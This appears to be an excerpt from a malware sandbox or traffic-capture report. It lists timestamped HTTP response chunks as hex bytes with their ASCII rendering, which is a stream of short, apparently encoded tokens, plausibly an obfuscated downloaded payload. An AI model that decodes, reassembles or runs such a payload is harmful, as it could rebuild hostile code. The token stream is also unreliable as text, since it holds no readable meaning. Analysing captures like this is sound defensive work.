                                                  2021-10-29 18:30:02 UTC1670INData Raw: 4b 20 59 78 20 4f 6f 52 20 4b 78 20 4f 4f 4b 20 51 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 6f 20 4f 4f 4b 20 6f 4b 51 20 6f 59 59 20 4f 4f 6f 20 4b 51 20 59 6b 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 78 59 20 4f 4f 6f 20 4f 4f 4b 20 4b 51 20 59 78 20 59 4b 20 51 59 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 45 20 4f 6f 4f 20 4b 51 20 59 78 20 4b 6b 20 51 4b 20 4f 4f 6f 20 6f 52 20 59 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 78 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 6f 20 74 6f 20 4f 4b 59 20 4b 6b 20 59 78 20 59 4b 20 6b 45 20 6f 51 20 4f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 6b 20 45 74 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 6f 4f 20 4f 78 4f 20 45 4f 20 4f 4f 78 20 4b 6b 20 59 78 20 52 78 20 45 6b
                                                  Data Ascii: K Yx OoR Kx OOK Qt OxQ OOo Yx Kk Yx YK ko OOK oKQ oYY OOo KQ Yk Yx YK kY OxY RQ OxY OOo OOK KQ Yx YK QY OOK OOt OoK E OoO KQ Yx Kk QK OOo oR Yo OOo Yx Yk QE OxQ kK OOK Oot Oxo to OKY Kk Yx YK kE oQ Ooo OxQ OOo YR Rk Et YK kK OOY OoO OxO EO OOx Kk Yx Rx Ek
                                                  2021-10-29 18:30:02 UTC1672INData Raw: 20 4f 4f 4b 20 4f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 45 59 20 52 74 20 4b 45 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 6f 74 20 4f 4f 4f 20 4f 4b 20 4b 6b 20 4b 51 20 59 78 20 59 78 20 4f 4f 45 20 51 59 20 51 6b 20 74 59 20 4f 4b 20 59 4f 20 4b 51 20 59 78 20 59 78 20 4f 74 78 20 4f 4f 52 20 4f 59 4f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 52 74 20 4b 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 78 20 6f 45 74 20 4f 4f 4b 20 59 4f 20 4b 6b 20 59 4b 20 45 78 20 6b 59 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 45 4f 20 4b 52 20 4b 6b 20 59 78 20 52 78 20 51 59 20 74 4b 20 52 4b 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 59 59 20 51 45 20 4b 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 51 74 20 4f 6f 78 20 4b 6f 20 45 51 20 45 74 20 4f 6b 74 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59
                                                  Data Ascii: OOK OoO OxQ OOo EY Rt KE YK kK Oox Oot OOO OK Kk KQ Yx Yx OOE QY Qk tY OK YO KQ Yx Yx Otx OOR OYO Oxk OOo Yo Rt Kx YK kK Oox kx oEt OOK YO Kk YK Ex kY OOK OOt tx EO KR Kk Yx Rx QY tK RK Oxk OOo Yx YY QE KE kK OOK Oot Qt Oox Ko EQ Et Okt Oo OOK OOt Oxk kY
                                                  2021-10-29 18:30:02 UTC1673INData Raw: 20 74 6f 20 4b 6b 20 59 78 20 59 4b 20 4f 45 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4b 78 20 59 4f 20 4b 6b 20 59 78 20 59 52 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 74 6f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 74 20 59 4f 20 59 4b 20 6b 4b 20 6f 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 4b 51 20 4b 6b 20 59 78 20 59 4b 20 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 4f 4f 4b 20 59 78 20 4b 6b 20 59 78 20 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4b 6f 20 4f 4f 45 20 59 78 20 4b 6b 20 74 4b 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4b 6b 20 59 78 20 59
                                                  Data Ascii: to Kk Yx YK OEk OOK OOt OxQ Kx YO Kk Yx YR kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK to OxQ OOo Yx ot YO YK kK oR OOR OxQ OOo KQ Kk Yx YK QK OOK OOt Oxk OOK Yx Kk Yx t kK OOK OOt Ko OOE Yx Kk tK YY kK OOK Oot OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yo Kk Yx Y
                                                  2021-10-29 18:30:02 UTC1674INData Raw: 4f 51 74 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 4b 51 20 59 78 20 4b 6b 20 59 52 20 6b 51 20 51 6b 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 74 20 59 6f 20 59 52 20 45 59 20 59 78 20 74 6b 20 6f 59 59 20 4b 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 6f 4f 20 6f 6f 52 20 6f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 74 4f 20 59 78 20 4b 6b 20 59 52 20 52 51 20 4f 78 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 45 4f 20 4f 59 6b 20 4b 6b 20 59 78 20 4b 6b 20 59 51 20 74 45 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 6b 20 59 4f 20 59 4b 20 6b 6f 20 51 51
                                                  Data Ascii: OQt Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot RQ KQ Yx Kk YR kQ Qk OOY OOt Oxt Qt Yo YR EY Yx tk oYY Kt OxQ OOo YO oO ooR oxk kK OOK OOE RQ tO Yx Kk YR RQ Oxk OOK OOt OxE EO OYk Kk Yx Kk YQ tE OOt OxQ Ooo QE k YO YK ko QQ
                                                  2021-10-29 18:30:02 UTC1676INData Raw: 4f 4f 6f 20 59 52 20 74 6b 20 4b 4b 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 4f 4b 20 4f 4f 6f 20 59 78 20 59 6b 20 45 4b 20 59 4b 20 6b 52 20 4f 78 4f 20 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 45 6f 20 74 59 20 4b 52 20 6f 45 6f 20 4f 6f 6f 20 45 4f 20 6b 59 20 4b 6b 20 59 78 20 52 78 20 51 59 20 4f 4f 74 20 4f 78 51 20 6f 4b 74 20 4f 4f 78 20 4f 51 4f 20 4f 78 52 20 59 78 20 59 4b 20 6b 59 20 6b 74 20 4f 52 59 20 6f 4b 45 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 45 78 20 74 6f 20 59 78 20 4b 6b 20 59 52 20 45 78 20 51 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 6f 20 59 6f 20 59 59 20 45 74 20 4f 74 6f 20 51 4b 20 6b 51 20 4f 4f 45 20 4f 78 52 20 4f 78 6f 20 4f 52 6b 20 59 6b 20 6f 45 52 20
                                                  Data Ascii: OOo YR tk KK YK kK Oox oR OOK OOo Yx Yk EK YK kR OxO oKk YY OOo Yx KQ oE Eo tY KR oEo Ooo EO kY Kk Yx Rx QY OOt OxQ oKt OOx OQO OxR Yx YK kY kt ORY oKE OOo Yx Yo oR O kK OOK Oot Ex to Yx Kk YR Ex Q OOK OOt OxE Qo Yo YY Et Oto QK kQ OOE OxR Oxo ORk Yk oER
                                                  2021-10-29 18:30:02 UTC1677INData Raw: 59 78 20 59 4b 20 6b 59 20 6b 74 20 4f 52 59 20 4f 52 6f 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 45 78 20 74 6f 20 59 78 20 4b 6b 20 59 52 20 52 6b 20 4b 51 20 4f 4f 45 20 4f 4f 74 20 6f 51 20 4f 4b 20 4b 4b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 4f 78 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 51 6f 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4b 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 59 20 59 74 20 45 51 20 51 4b 20 51 78 20 74 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 51 20 51 6f 20 45 51 20 51 59 20 51 78 20 74 45 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 51 20 6b 74 20 45 78 20 59 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 74 20 59 52 20 6f 4b 20 4f 6f 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 6f
                                                  Data Ascii: Yx YK kY kt ORY ORo OOo Yx Yo oR O kK OOK Oot Ex to Yx Kk YR Rk KQ OOE OOt oQ OK KK Kk Yx Rx OoK OxQ OOt OxQ Ooo QE Qo Yx YK QK oQ KE OxQ OOo YR EY Yt EQ QK Qx tE OxQ OOo YR oQ Qo EQ QY Qx tE OxQ OOo YR oQ kt Ex Yo OOK OOt OxE Qt YR oK OoO YK kK Oox oR Oo
                                                  2021-10-29 18:30:02 UTC1678INData Raw: 59 20 4f 4f 74 20 4f 78 74 20 51 78 20 52 6b 20 59 78 20 6f 52 20 45 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 45 4f 20 6b 59 20 59 4b 20 4b 6b 20 52 52 20 45 78 20 4f 4b 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 59 52 20 4b 6b 20 59 78 20 6f 51 20 6b 74 20 4f 4f 6b 20 6f 52 20 4f 45 45 20 4f 4f 45 20 59 78 20 59 4b 20 6f 4b 20 59 4b 20 74 4f 20 52 52 20 4f 6f 52 20 4f 78 51 20 51 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 6b 6b 20 45 51 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 4b 59 20 4f 4f 45 20 4f 78 51 20 78 20 6f 52 20 6f 45 45 20 59 78 20 59 4b 20 6b 6f 20 51 78 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 6f 59 20 59 4f 20 59 4b 20 59 4f 20 51 78 20 4f 4f 6b 20 4f 6f 45 20 4f 78 4b 20 4f 6f 52 20 59 6f 20
                                                  Data Ascii: Y OOt Oxt Qx Rk Yx oR EY kK OOK OOY EO kY YK Kk RR Ex OKO OOK OOt Oxt kk YR Kk Yx oQ kt OOk oR OEE OOE Yx YK oK YK tO RR OoR OxQ Qo Yx Kk Yx YK kK OOK OOt OOO kk EQ Kk Yx Kk Ek KY OOE OxQ x oR oEE Yx YK ko Qx OoR OxQ OOo oY YO YK YO Qx OOk OoE OxK OoR Yo
                                                  2021-10-29 18:30:02 UTC1680INData Raw: 6f 78 20 4f 6b 6b 20 6b 51 20 4f 78 74 20 4f 6b 74 20 52 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 4f 6f 59 20 59 45 20 59 59 20 4f 6b 6b 20 51 59 20 74 59 20 51 6b 20 4b 4b 20 4f 78 4f 20 4f 78 6f 20 4b 59 20 45 6f 20 6f 52 20 6b 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 52 20 4f 78 6f 20 59 51 20 45 6b 20 59 45 20 4f 6b 4b 20 52 4f 20 4f 6f 6f 20 6f 59 4f 20 4b 20 4b 4f 20 6f 52 20 51 59 20 59 78 20 59 4b 20 51 4b 20 4f 20 4f 78 6f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 4f 20 59 6f 20 45 4b 20 51 45 20 4f 6f 6f 20 6f 52 20 74 74 20 4f 4f 6f 20 59 78 20 59 4b 20 45 45 20 59 78 20 4f 45 6b 20 4f 4f 51 20 6b 45 20 4f 74 51 20 4f 4f 6f 20 45 6b 20 6f 52 20 45 59 20 59 78 20 4f 6f 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78
                                                  Data Ascii: ox Okk kQ Oxt Okt Rx OOK OOt Oxk OoY YE YY Okk QY tY Qk KK OxO Oxo KY Eo oR kQ kK OOK Oot OxR Oxo YQ Ek YE OkK RO Ooo oYO K KO oR QY Yx YK QK O Oxo OxQ OOo Yo YO Yo EK QE Ooo oR tt OOo Yx YK EE Yx OEk OOQ kE OtQ OOo Ek oR EY Yx OoR OOK OOt Oxk QR Yx Kk Yx
                                                  2021-10-29 18:30:02 UTC1681INData Raw: 4b 20 45 78 20 4b 6b 20 45 51 20 45 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 74 6f 20 6f 4b 20 74 4f 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 4f 6f 20 6f 20 78 20 59 78 20 4b 6b 20 59 52 20 52 4f 20 6b 52 20 4f 4f 52 20 74 20 6f 4b 78 20 4f 4f 74 20 59 78 20 52 4b 20 59 45 20 4b 51 20 6f 4f 6b 20 6f 74 20 51 51 20 52 51 20 4f 78 74 20 59 78 20 4b 6b 20 59 6f 20 6f 52 20 6b 6f 20 4f 20 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 74 4b 20 59 6f 20 6f 6b 20 74 4f 20 52 52 20 4f 6f 74 20 4f 78 51 20 6f 4b 4f 20 59 78 20 4b 6b 20 59 78 20 45 59 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4f 20 4f 4f 59 20 52 4b 20 4f 45 59 20 59 59 20 59 4b 20 45 52 20 51 78 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 45 6b 20 6f 52 20 52 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 45 20
                                                  Data Ascii: K Ex Kk EQ E OOt OxQ Ooo to oK tO YK kK Oox OOo o x Yx Kk YR RO kR OOR t oKx OOt Yx RK YE KQ oOk ot QQ RQ Oxt Yx Kk Yo oR ko O K OxQ OOo YR tK Yo ok tO RR Oot OxQ oKO Yx Kk Yx EY kK OOK Oxx OOO OOY RK OEY YY YK ER Qx kO OxQ OOo Yo Ek oR RQ kK OOK Oot OxE
                                                  2021-10-29 18:30:02 UTC1682INData Raw: 78 52 20 51 78 20 6f 6f 4b 20 6f 4b 20 6b 6f 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 78 52 20 51 74 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 4f 45 59 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 6f 52 20 6b 6b 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f 4f 20 45 4f 20 52 52 20 4b 6b 20 59 78 20 52 78 20 6b 74 20 4f 4f 6b 20 51 45 20 74 4b 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 6b 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 74 4f 20 4f 4f 6f 20 59 78 20 4b 45 20 6f 20 59 45 20 6b 4b 20 4f 4f 4f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 45 45 20 4b 6b 20 59 78 20 45 51 20 6b 52 20 51 4b 20 4f 4f 45 20 4f 4f 4f 20 6f 59 4b 20 45 4f 20 59 6f 20 45 6b 20
                                                  Data Ascii: xR Qx ooK oK ko YK kK Oox OxR Qt oYE OxK Kk Yx YY OOE ORo OEY OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk oR kk kK OOK Oot OOO EO RR Kk Yx Rx kt OOk QE tK OOo Yx YK QE kt kK OOK Oot tO OOo Yx KE o YE kK OOO OOt OxQ OOo EE Kk Yx EQ kR QK OOE OOO oYK EO Yo Ek
                                                  2021-10-29 18:30:02 UTC1684INData Raw: 6f 6b 20 45 59 20 59 45 20 45 45 20 4f 6f 20 4f 78 52 20 4b 78 20 52 4b 20 4f 6f 4b 20 59 6f 20 52 52 20 4f 4f 52 20 4b 51 20 6b 4b 20 6f 20 51 45 20 74 78 20 4f 4f 6f 20 59 78 20 59 6b 20 59 52 20 4b 51 20 52 74 20 4b 6f 20 4f 6f 52 20 4f 78 52 20 4f 4f 4b 20 51 45 20 4f 74 6b 20 59 78 20 59 4b 20 51 4b 20 74 74 20 45 51 20 4f 4b 52 20 4f 4b 45 20 6f 78 59 20 59 4b 20 6f 4b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 6f 20 51 45 20 4f 4f 74 20 59 78 20 4f 4f 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 78 74 20 4f 4f 74 20 4f 78 51 20 51 74 20 52 59 20 4f 74 51 20 59 78 20 59 4b 20 51 4b 20 4f 6f 78 20 51 51 20 4f 78 6f 20 51 4f 20 6f 78 20 59 4b 20 4b 6b 20 4b 51 20 59 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4b 51 20 59 59 20 4b 51 20 6b 51 20 6f 78 6b 20
                                                  Data Ascii: ok EY YE EE Oo OxR Kx RK OoK Yo RR OOR KQ kK o QE tx OOo Yx Yk YR KQ Rt Ko OoR OxR OOK QE Otk Yx YK QK tt EQ OKR OKE oxY YK oK YK kK OOK Oxo QE OOt Yx OOo Yx YK kK Oxt OOt OxQ Qt RY OtQ Yx YK QK Oox QQ Oxo QO ox YK Kk KQ YQ kY OOt OxQ Ooo KQ YY KQ kQ oxk
                                                  2021-10-29 18:30:02 UTC1685INData Raw: 4f 52 6b 20 4f 74 78 20 59 4b 20 6b 4f 20 4f 6f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 4b 4f 20 78 20 59 4f 20 59 4b 20 52 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 78 74 20 59 78 20 4b 6b 20 45 59 20 59 6f 20 4b 74 20 4f 4f 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 51 45 20 59 78 20 59 4f 20 59 4b 20 6b 6f 20 4f 6f 78 20 4f 74 4f 20 4f 78 4b 20 6b 52 20 45 52 20 59 6b 20 6f 45 52 20 59 4b 20 6b 6f 20 6b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 45 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 52 20 52 78 20 4b 6b 20 59 59 20 59 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 4f 6b 20 52 4b 20 4b 6b 20 4b 6b 20 45 74 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 78 20 4f 78 51 20 4f 4f 6f 20 45 59 20 59 78 20 74 45 20 59 6f
                                                  Data Ascii: ORk Otx YK kO OoY OOt OxQ OOE KO x YO YK RY OOK OOt OxQ Oxt Yx Kk EY Yo Kt OOo OOt OxQ OOR QE Yx YO YK ko Oox OtO OxK kR ER Yk oER YK ko kk OOt OxQ OOo YO Eo Yx YK kK OOK OOt OxQ OoR Rx Kk YY Yt kK OOK OOR OOk RK Kk Kk Et YK kK OOK OOx OxQ OOo EY Yx tE Yo
                                                  2021-10-29 18:30:02 UTC1686INData Raw: 59 78 20 59 6f 20 4b 51 20 6b 51 20 6b 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 4f 6f 6f 20 6f 45 52 20 59 45 20 6f 78 20 45 6f 20 51 4b 20 4f 74 6f 20 4f 4f 74 20 4f 78 74 20 51 78 20 59 78 20 4b 6b 20 59 4f 20 45 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 52 45 20 52 4f 20 59 4b 20 6b 4f 20 4f 6f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 4b 4f 20 78 20 4b 6b 20 59 4b 20 52 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 78 6b 20 59 78 20 4b 6b 20 45 59 20 59 6f 20 4b 74 20 4f 4f 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 4b 51 20 51 59 20 45 52 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 6f 74 20 4f 74 51 20 4f 4f 74 20 6f 78 20 45 6b 20 59 52 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 45 6f 20 59 78
                                                  Data Ascii: Yx Yo KQ kQ kE OOY OOt Oxt Ooo oER YE ox Eo QK Oto OOt Oxt Qx Yx Kk YO Ek kK OOK OOt OxQ OOo Yx RE RO YK kO OoY OOt OxQ OOE KO x Kk YK RR OOK OOt OxQ Oxk Yx Kk EY Yo Kt OOo OOt OxQ OOR KQ QY ER YY kK OOR Oot OtQ OOt ox Ek YR oEo kK OOR QY OxQ OOo YO Eo Yx
                                                  2021-10-29 18:30:02 UTC1688INData Raw: 4f 78 51 20 4f 78 6f 20 59 78 20 4b 6b 20 59 78 20 4b 6f 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4f 20 4f 4f 20 4b 6b 20 4b 6b 20 59 78 20 59 78 20 6b 74 20 6f 51 20 4f 78 6f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 59 6b 20 6f 45 52 20 59 4f 20 4f 4f 4b 20 4f 78 78 20 4f 6f 74 20 4f 74 51 20 4f 4f 6f 20 59 6f 20 6f 52 20 59 78 20 59 4b 20 6b 59 20 51 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 74 20 51 4f 20 4f 4f 4b 20 4f 4f 6f 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 4b 4f 20 52 20 6b 52 20 4f 4f 4b 20 51 51 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 4b 20 59 78 20 59 4b 20 52 51 20 4f 4f 6f 20 4f 4b 20 4f 4f 4f 20 4f 4f 6f 20 59 78 20 59 6f 20 4b 51 20 6b 51 20 51 4b 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 4f 6f 6f 20 6f 45 52 20
                                                  Data Ascii: OxQ Oxo Yx Kk Yx Ko kK OOK Oxx OOO OO Kk Kk Yx Yx kt oQ Oxo Oxk OOo Yo Yk oER YO OOK Oxx Oot OtQ OOo Yo oR Yx YK kY Qk OOt OxQ OOo Yx Kk Yx Yt QO OOK OOo Qk OOo Yx KQ KO R kR OOK QQ OxQ OOo Yx KK Yx YK RQ OOo OK OOO OOo Yx Yo KQ kQ QK OOY OOt Oxt Ooo oER
                                                  2021-10-29 18:30:02 UTC1689INData Raw: 4b 20 4f 4f 52 20 51 59 20 4f 78 6b 20 51 52 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 45 20 4f 6f 74 20 4f 4f 6f 20 52 6f 20 52 45 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 4f 78 20 4f 4f 6f 20 4b 6f 20 4b 6b 20 59 78 20 59 4b 20 74 51 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 4b 20 74 45 20 59 78 20 59 78 20 59 4b 20 6b 78 20 4f 4f 45 20 4f 4f 45 20 6f 20 4f 78 59 20 59 4f 20 4b 6b 20 59 6f 20 45 45 20 51 4b 20 4f 74 6f 20 4f 4f 6f 20 74 59 20 4f 78 6f 20 59 52 20 6f 45 6b 20 59 78 20 4b 6b 20 4f 6f 52 20 4f 4f 59 20 4f 78 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 52 51 20 51 51 20 4f 4f 74 20 4f 78 4b 20 4f 6f 74 20 59 78 20 4b 6b 20 59 4f 20 4f 6f 20 6b 52 20 4f 78 4f 20 6f 52 20 45 52 20
                                                  Data Ascii: K OOR QY Oxk QR Yx Kk Yx YK kK OOK OxE Oot OOo Ro RE Yx YK kY OxY RQ OOx OOo Ko Kk Yx YK tQ OOK OOt OoK OOK tE Yx Yx YK kx OOE OOE o OxY YO Kk Yo EE QK Oto OOo tY Oxo YR oEk Yx Kk OoR OOY OxO OxQ OOo Yx Kk Yx YK RQ QQ OOt OxK Oot Yx Kk YO Oo kR OxO oR ER
                                                  2021-10-29 18:30:02 UTC1690INData Raw: 20 4f 4f 4f 20 51 6b 20 59 52 20 74 6b 20 59 59 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 20 4f 78 52 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 6f 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 52 51 20 4f 51 59 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 51 4b 20 4f 6f 74 20 4f 4f 20 4f 78 4f 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f 6b 51 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 6f 52 20 4f 4f 52 20 6f 59 20 59 6b 20 4f 6b 20 4f 51 78 20 74 4f 20 4f 4f 4b 20 4f 4f 74 20 52 51 20 6f 45 51 20 59 78 20 4b 6b 20 59 52 20 45 51 20 6b 78 20 4f 4f 52 20 4f 6f 59 20 4f 6f 74 20 4f 4f 59 20 51 45 20 4f 6b 59 20 59 78 20 59 4b 20 6b 6f 20 51 4b 20 4f 59 52 20 4f 78 78 20 51 51 20 59 59 20 45 4b 20 59 59 20 52 51 20 6f 4f 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 4f 4b
                                                  Data Ascii: OOO Qk YR tk YY YK kK OOk OO OxR OOo Yx Yo oR ot kK OOK OOY RQ OQY YO Kk Yo EQ QK Oot OO OxO OOo Yx Yo oR OkQ kK OOK OOY OoR OOR oY Yk Ok OQx tO OOK OOt RQ oEQ Yx Kk YR EQ kx OOR OoY Oot OOY QE OkY Yx YK ko QK OYR Oxx QQ YY EK YY RQ oOR OOY OOt Oxt kk OK
                                                  2021-10-29 18:30:02 UTC1692INData Raw: 20 4f 6b 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 45 78 20 4f 4f 4b 20 4b 6b 20 4b 6b 20 59 6f 20 52 78 20 74 59 20 4f 6f 59 20 6f 4b 6b 20 51 51 20 4f 4f 6f 20 59 78 20 59 78 20 6f 45 20 45 6f 20 52 4b 20 4f 4b 78 20 4f 4f 59 20 59 45 20 4f 4f 6f 20 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 78 74 20 6b 59 20 45 74 20 45 52 20 6f 78 4b 20 4b 6b 20 4f 45 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 45 20 4f 74 51 20 4b 6b 20 59 78 20 4b 6b 20 6f 4b 52 20 6b 74 20 4f 78 51 20 4f 6f 4f 20 4f 4b 6f 20 59 6f 20 4f 78 52 20 59 78 20 59 4b 20 6b 6f 20 4f 20 6f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4f 4b 52 20 6f 45 20 4b 74 20 52 4b 20 4f 4b 78 20 4f 4f 59 20 59 4b 20 4f 4f 6f 20 59 78 20 59 4b 20 52 59 20 4f 6b 45 20 6b 4b 20 4f 4f
                                                  Data Ascii: Okk kK OOK OOY Ex OOK Kk Kk Yo Rx tY OoY oKk QQ OOo Yx Yx oE Eo RK OKx OOY YE OOo Yx YK RY OkE kK OOK OOY oxt kY Et ER oxK Kk OE OOK OOt Oxt E OtQ Kk Yx Kk oKR kt OxQ OoO OKo Yo OxR Yx YK ko O oKK OxQ OOo Yo OKR oE Kt RK OKx OOY YK OOo Yx YK RY OkE kK OO
